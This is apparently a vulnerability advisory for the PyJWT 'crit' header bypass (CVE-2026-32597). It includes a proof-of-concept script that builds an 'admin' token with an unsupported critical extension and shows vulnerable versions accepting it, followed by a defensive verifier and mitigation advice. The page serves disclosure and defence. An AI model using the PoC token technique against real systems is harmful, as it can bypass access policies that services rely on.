PyJWT < 2.12.0 crit header bypass / Insufficient crit validation
Summary: PyJWT before 2.12.0 does not validate the JOSE "crit" header adequately. A token that declares a critical header parameter the library does not implement is accepted instead of rejected, which is what RFC 7515 section 4.1.11 requires of a recipient that does not understand a listed extension. Note that PyJWT still verifies the signature, so the attacker needs a token that validates under the application's key; what is bypassed is whatever policy the critical extension was meant to carry (the PoC below declares a hypothetical "x-custom-policy" extension), not the signature check itself. Fixed in PyJWT 2.12.0; the advisory rates it CVSS 7.5.

2026-03-14 22:33:56 Author: cxsecurity.com (view original) Reads: 8


#!/usr/bin/env python3
# Exploit Title: PyJWT < 2.12.0 crit header bypass / Insufficient crit validation
# CVE: CVE-2026-32597
# Date: 2026-03
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://github.com/jpadilla/pyjwt
# Software Link: https://pypi.org/project/PyJWT/
# Affected: PyJWT < 2.12.0
# Tested on:
# Category: Authentication Bypass
# Platform: Python
# Exploit Type: Proof of Concept
# CVSS: 7.5
# CWE : CWE-345, CWE-863
# Description: PyJWT does not reject JWTs containing unknown critical header parameters (crit)
# Fixed in: PyJWT 2.12.0
# Usage:
#   python3 exploit.py
#
# Examples:
#   python3 exploit.py
#
# Notes: Demonstrates acceptance of token with unknown critical extension

print(r"""
╔════════════════════════════════════════════════════════╗
║                                                        ║
║           b a n y a m e r _ s e c u r i t y            ║
║                                                        ║
║        >>> Silent Hunter • Shadow Presence <<<         ║
║                                                        ║
║  Operator : Mohammed Idrees Banyamer  Jordan           ║
║  Handle   : @banyamer_security                         ║
║                                                        ║
║  CVE-2026-32597 • PyJWT crit header bypass             ║
║                                                        ║
╚════════════════════════════════════════════════════════╝
""")

import jwt
import hmac
import hashlib
import base64
import json


def b64url_encode(data):
    # base64url without padding, as required for JWS compact serialization
    if isinstance(data, str):
        data = data.encode('utf-8')
    encoded = base64.urlsafe_b64encode(data).rstrip(b'=')
    return encoded.decode('utf-8')


# JOSE header: "crit" declares x-custom-policy as a critical extension that a
# verifier MUST understand, otherwise it MUST reject the token (RFC 7515 4.1.11).
header = {
    "alg": "HS256",
    "crit": ["x-custom-policy"],
    "x-custom-policy": "require-mfa-and-binding"
}

payload = {
    "sub": "attacker",
    "role": "admin",
    "exp": 9999999999
}

# The token is signed with the real key: this demonstrates a crit bypass,
# not a signature bypass.
secret = b"secret-key"

header_str = json.dumps(header, separators=(',', ':'))
payload_str = json.dumps(payload, separators=(',', ':'))
h = b64url_encode(header_str)
p = b64url_encode(payload_str)

signing_input = f"{h}.{p}".encode('utf-8')
signature = hmac.new(secret, signing_input, hashlib.sha256).digest()
sig = b64url_encode(signature)

malicious_token = f"{h}.{p}.{sig}"

print("Generated malicious token:")
print(malicious_token)
print("\n")

print("Decoding with PyJWT (vulnerable versions accept this token):")
try:
    decoded = jwt.decode(
        malicious_token,
        secret,
        algorithms=["HS256"],
        options={"verify_signature": True}
    )
    print("TOKEN ACCEPTED (vulnerable behavior):")
    print(decoded)
except jwt.exceptions.InvalidTokenError as e:
    print("TOKEN REJECTED (correct / patched behavior):")
    print(e)
except Exception as e:
    print("Unexpected error:")
    print(e)
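The PoC shows the failure mode; what a practitioner wants next is the check the verifier should have made. The following is an added example, not the exploit author's code and not PyJWT's own implementation: a minimal HS256 JWS verifier that applies the RFC 7515 section 4.1.11 rules to "crit" before returning any claims. It goes slightly beyond the single case on the page by also rejecting the malformed crit lists the RFC forbids producers from emitting (empty list, duplicate names, names of registered headers, names not present in the header), which a recipient is permitted to treat as invalid. All function names (build_hs256, check_crit, verify_hs256, is_rejected, demo) and the sample key and token are constructed for this example; the token is built exactly as the PoC builds it.

```python
"""Added example (not part of the original exploit or of PyJWT): an HS256
JWS verifier that enforces RFC 7515 section 4.1.11 "crit" semantics.
All names and sample data here are constructed for illustration."""
import base64
import hashlib
import hmac
import json

# Header parameter names registered by RFC 7515 section 4.1. A "crit" list
# must not name any of these; a recipient may reject a JWS that does.
REGISTERED_HEADERS = frozenset(
    ["alg", "jku", "jwk", "kid", "x5u", "x5c", "x5t", "x5t#S256", "typ", "cty", "crit"]
)


class InvalidJWS(Exception):
    """Raised for any token the verifier refuses to accept."""


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # Restore the padding that compact serialization strips.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def build_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Sign a token the same way the PoC does (compact JSON, HS256)."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def check_crit(header: dict, understood: set) -> list:
    """Apply RFC 7515 4.1.11. Returns the critical extension names the caller
    must now evaluate, or raises InvalidJWS. Absent crit means no extensions."""
    if "crit" not in header:
        return []
    crit = header["crit"]
    if not isinstance(crit, list) or not crit or not all(isinstance(n, str) for n in crit):
        raise InvalidJWS("crit must be a non-empty array of strings")
    if len(set(crit)) != len(crit):
        raise InvalidJWS("crit contains duplicate names")
    for name in crit:
        if name in REGISTERED_HEADERS:
            raise InvalidJWS(f"crit must not name registered header {name!r}")
        if name not in header:
            raise InvalidJWS(f"crit names header {name!r} that is not present")
        if name not in understood:
            # This is the check the vulnerable PyJWT versions skipped.
            raise InvalidJWS(f"unsupported critical extension {name!r}")
    return list(crit)


def verify_hs256(token: str, secret: bytes, understood: set) -> dict:
    """Verify the signature, then the crit rules. Returns the claims plus the
    critical extension values, which the caller must still enforce: this
    function cannot know what 'require-mfa-and-binding' means."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        sig = b64url_decode(s)
    except ValueError as exc:  # bad base64, bad JSON, wrong segment count
        raise InvalidJWS("malformed token") from exc
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise InvalidJWS("unexpected or missing alg")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        raise InvalidJWS("bad signature")
    exts = check_crit(header, understood)
    claims = json.loads(b64url_decode(p))
    return {"claims": claims, "critical_extensions": {e: header[e] for e in exts}}


def is_rejected(token: str, secret: bytes, understood: set) -> bool:
    try:
        verify_hs256(token, secret, understood)
        return False
    except InvalidJWS:
        return True


# Constructed sample: the PoC's header, payload and key.
SECRET = b"secret-key"
TOKEN = build_hs256(
    {"alg": "HS256", "crit": ["x-custom-policy"], "x-custom-policy": "require-mfa-and-binding"},
    {"sub": "attacker", "role": "admin", "exp": 9999999999},
    SECRET,
)


def demo() -> dict:
    """Same token, two verifiers: one that does not implement the extension
    (must reject) and one that does (accepts and surfaces the policy value)."""
    results = {}
    try:
        verify_hs256(TOKEN, SECRET, understood=set())
        results["unknown_crit"] = "accepted"
    except InvalidJWS as exc:
        results["unknown_crit"] = f"rejected: {exc}"
    out = verify_hs256(TOKEN, SECRET, understood={"x-custom-policy"})
    results["known_crit"] = out["critical_extensions"]
    return results


if __name__ == "__main__":
    print(demo())
```

The order matters: the signature is checked first so that an unsigned token cannot drive the crit logic, and crit is checked before any claim is returned so a caller never sees "role": "admin" from a token whose policy extension it cannot evaluate. On a PyJWT version that cannot be upgraded, the same screening can be applied by reading the header with jwt.get_unverified_header(token) and refusing to call jwt.decode when its "crit" list names anything the application does not implement; that pre-check is the application's responsibility and is not a substitute for moving to 2.12.0.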

References:

https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f

https://datatracker.ietf.org/doc/html/rfc7515#section-4.1.11

Copyright 2026, cxsecurity.com

Article source: https://cxsecurity.com/issue/WLB-2026030017